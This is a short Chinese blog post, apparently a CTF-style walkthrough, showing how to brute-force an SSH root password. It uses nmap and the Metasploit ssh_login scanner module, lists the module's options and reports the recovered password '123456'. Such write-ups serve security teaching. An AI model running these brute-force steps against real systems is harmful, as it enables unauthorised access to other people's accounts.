ssh爆破获取用户密码

通过nmap扫描目标主机发现ssh版本为OpenSSH 5.3,有漏洞影响版本(OpenSSH =< 8.3p1)

ssh爆破获取用户密码

使用msfconsole 工具

 ssh爆破获取用户密码

 search ssh        #查找有关ssh的漏洞

找到并使用漏洞use auxiliary/scanner/ssh/ssh_login

ssh爆破获取用户密码

show options        #查看此漏洞需要的配置信息

set RHOSTS         #配置目标主机ip

set USERNAME        #设置用户名(题目已知用户名为root)

set PASS_FILE         #配置爆破密码所需字典(一般题目自带字典)

set THREADS           #配置线程

ssh爆破获取用户密码

 run 或  exploit         #执行漏洞

ssh爆破获取用户密码

 爆破成功,获取密码:123456

 

 

 

 

 

版权声明:玥玥 发表于 2021-08-25 6:47:00。
转载请注明:ssh爆破获取用户密码 | 女黑客导航